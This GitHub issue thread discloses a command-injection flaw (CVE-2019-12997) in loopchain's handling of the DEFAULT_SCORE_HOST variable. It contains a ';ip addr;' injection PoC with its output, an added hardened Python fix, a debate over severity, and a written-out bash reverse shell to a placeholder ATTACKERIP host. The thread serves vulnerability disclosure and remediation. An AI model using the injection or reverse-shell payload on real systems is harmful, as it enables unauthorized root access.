This repository has been archived by the owner on Dec 15, 2021. It is now read-only.

Command Injection (Privilege Escalation) #231

Closed
ghost opened this issue Jun 20, 2019 · 11 comments

Comments

@ghost

ghost commented Jun 20, 2019

Description:

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

Details:

An attacker can manipulate DEFAULT_SCORE_HOST which is trusted user supplied input, this can be used to inject commands and gain arbitrary code execution.

Affected URL:

https://github.com/icon-project/loopchain/blob/2ab4734138d6a2a480a08ee023b2f4d74679ed43/loopchain/__main__.py

Affected Code:

if os.getenv('DEFAULT_SCORE_HOST') is not None:
    os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")

Reference:

https://www.owasp.org/index.php/Command_Injection

Example/PoC:

import os
os.environ['DEFAULT_SCORE_HOST'] = ';ip addr;'
os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> ~/.ssh/known_hosts")
usage: ssh-keyscan [-46cHv] [-f file] [-p port] [-T timeout] [-t type]
[host | addrlist namelist] ...
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host 
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:8c:ab:b0 brd ff:ff:ff:ff:ff:ff
inet 172.16.12.139/24 brd 172.16.12.255 scope global dynamic noprefixroute ens33
valid_lft 1156sec preferred_lft 1156sec
inet6 fe80::f8e1:1ae5:174a:ea03/64 scope link noprefixroute 
valid_lft forever preferred_lft forever
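The pattern behind this report, an environment value concatenated into a shell string, is fixable without a shell at all. The following is an added defender's example, not code from the loopchain repository or from the reporter: it validates the value as a single hostname or IP literal (the hostname regex and the "one host only" assumption are mine), passes the result to ssh-keyscan as an argument vector so no shell ever parses it, and does the known_hosts append from Python in the invoking user's home rather than through a `>>` redirection to /root. The `run` parameter and the `_Fake` object in the test are test hooks, not part of any real API beyond `subprocess.run`. Inputs such as the PoC's `;ip addr;` are rejected before anything is executed.

```python
import ipaddress
import os
import re
import subprocess
from pathlib import Path

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, at most 253 characters overall.
# Shell metacharacters (; | & $ ` ( ) > < and whitespace) cannot match this,
# so a value such as ';ip addr;' is refused before anything runs.
_HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def is_valid_host(value: str) -> bool:
    """True only for a single hostname or IP literal; anything else is rejected."""
    if not value:
        return False
    try:
        ipaddress.ip_address(value)  # accepts IPv4 and IPv6 literals
        return True
    except ValueError:
        pass
    return _HOSTNAME_RE.fullmatch(value) is not None


def keyscan_argv(host: str) -> list:
    """Build the ssh-keyscan argument vector; refuse anything that is not a host."""
    if not is_valid_host(host):
        raise ValueError(f"DEFAULT_SCORE_HOST is not a hostname or IP literal: {host!r}")
    # A list of arguments goes straight to execve(): no shell parses it, so
    # ';', '|' or '$(...)' inside `host` would be literal characters even if
    # the validation above were somehow bypassed.
    return ["ssh-keyscan", host]


def scan_host_keys(host: str, run=subprocess.run) -> str:
    """Return ssh-keyscan's stdout for `host`. `run` is injectable for testing (assumed hook)."""
    result = run(keyscan_argv(host), capture_output=True, text=True, check=False)
    return result.stdout


def append_known_hosts(host: str, known_hosts: Path, run=subprocess.run) -> int:
    """Replacement for the '>> /root/.ssh/known_hosts' redirection: the file is
    opened by Python, under the invoking user's home, with no shell involved.
    Returns the number of key lines appended."""
    keys = scan_host_keys(host, run=run)
    known_hosts.parent.mkdir(mode=0o700, parents=True, exist_ok=True)
    with known_hosts.open("a") as fh:
        fh.write(keys)
    return len(keys.splitlines())


if __name__ == "__main__":
    # Same trigger as the affected line: act only when the variable is set.
    host = os.getenv("DEFAULT_SCORE_HOST")
    if host is not None:
        try:
            n = append_known_hosts(host, Path.home() / ".ssh" / "known_hosts")
            print(f"appended {n} key line(s) for {host}")
        except ValueError as exc:
            print(f"rejected: {exc}")
        except FileNotFoundError:
            print("ssh-keyscan is not installed on this machine")
```

The two controls are independent: the argument vector alone already removes the shell, and the validation alone already refuses the PoC value, so either one would have closed the injection; keeping both means a future refactor that reintroduces `shell=True` still has the allow-list in front of it.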
@Spl3en
Contributor

Spl3en commented Jun 20, 2019

You mean an attacker having access to environment variables is also able to inject commands in their own loopchain node?
Is it really critical? As you need first to be able to overwrite environment variables remotely, in the remote loopchain user, then you need to be able to remotely reboot the loopchain node.
I'd agree the whole os.system code is bad and should be fixed, but "user input" can be misleading if the only user input you can inject is the one from the loopchain administrator.

@ghost
Author

ghost commented Jun 20, 2019

Hi, thanks for your reply. I totally agree with you, but I did not mean remotely. What I meant was an attacker can escalate privileges from a low privilege shell by changing the environment (injection into an environment variable).

yakkle added a commit that referenced this issue Jun 21, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
@yakkle
Member

yakkle commented Jun 21, 2019

I created a PR that would fix this issue.
Thank you.

@ghost
Author

ghost commented Jun 21, 2019

Thank you. Am I still eligible for a bounty please?

@Spl3en
Contributor

Spl3en commented Jun 21, 2019

You may need to apply in the ICONLOOP Bug Bounty program if you want to raise awareness about the vulnerability you found, and let the people responsible for the bug bounty program evaluate the vulnerability reward: https://hackerone.com/iconloop_inc

@sink772
Member

sink772 commented Jun 21, 2019

I don't think this is critical, because the attacker first needs to gain access to the host where the loopchain is running. Furthermore, loopchain itself doesn't need any special privileges to run, so there is nothing the attacker could get from such an attack.

@ghost
Author

ghost commented Jun 27, 2019

A hacker can escalate their privileges to root after gaining a low privilege shell. So it is a privilege escalation vulnerability; thanks anyway for listening.

@ghost ghost closed this as completed Jun 27, 2019
yakkle added a commit that referenced this issue Jun 27, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
yakkle added a commit that referenced this issue Jun 27, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
yakkle added a commit that referenced this issue Jun 28, 2019
 - remove legacy score configurations, useless code
 - fix command injection issue (#231)
@ghost
Author

ghost commented Jun 28, 2019

A CVE was assigned but unfortunately hackerone/your company refuses to pay the bounty. However my objective as a Security Researcher has been fulfilled, thank you for patching this vulnerability.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12997
https://nvd.nist.gov/vuln/detail/CVE-2019-12997

@ghost ghost changed the title Command Injection Command Injection (Privilege Escalation) Jun 28, 2019
@Spl3en
Contributor

Spl3en commented Jun 28, 2019

@memN0ps

A hacker can escalate their privileges to root after gaining a low privilege shell

Could you provide us detailed steps to reproduce such an exploit in a loopchain environment to acquire a root shell from your exploit, please?

As sink772 mentioned, the loopchain engine doesn't require running with any special privileges. So classifying this vulnerability as a privesc to root doesn't sound correct with the current vulnerability you've pointed out.

Thanks for the vulnerability report and for the fix, let's classify it correctly and remain factual.

@ghost
Author

ghost commented Jun 30, 2019

So if you look at this line of code:

os.system("ssh-keyscan "+os.getenv('DEFAULT_SCORE_HOST')+" >> /root/.ssh/known_hosts")

This command will need root privileges to run as it's trying to append/write something to /root/.ssh/known_hosts. (Anything that writes to the root directory needs root privilege.)

Let's say an attacker gets a low privilege shell where Loopchain is installed. The attacker now wants to escalate privileges to root, so he/she will inject a bash reverse shell inside the DEFAULT_SCORE_HOST environment variable; then whenever that line of code runs, it will send a reverse shell with root privileges to the attacker.

Simple but effective.

The line of code would then look like this:

os.system("ssh-keyscan "+ ;bash -i >& /dev/tcp/ATTACKERIP/PORT 0>&1;+" >> /root/.ssh/known_hosts")

As you can see the semi-colons terminated the irrelevant queries so only the attacker's code gets executed in bash. Now this command will have to be run as root as it's writing to the /root/ directory. Try and understand the concept please.

@Spl3en
Contributor

Spl3en commented Jun 30, 2019

I'm having no issue understanding the concept, but thanks for the explanation :)

then whenever that line of code runs, it will send a reverse shell with root privileges to the attacker.

No, that's not what happens in a normal scenario.
I'm actually trying to tell you that this line of code does nothing at all because the loopchain engine doesn't run anymore with root privileges. Look at the patch: the vulnerable lines of code have been removed.
You actually need to force root to start a loopchain instance if you want to escalate anything. Basically, you need a privesc in order to trigger your privesc.

Anyway, this is indeed a command injection from legacy code, and it deserved to be reported, so thanks for that.

This issue was closed.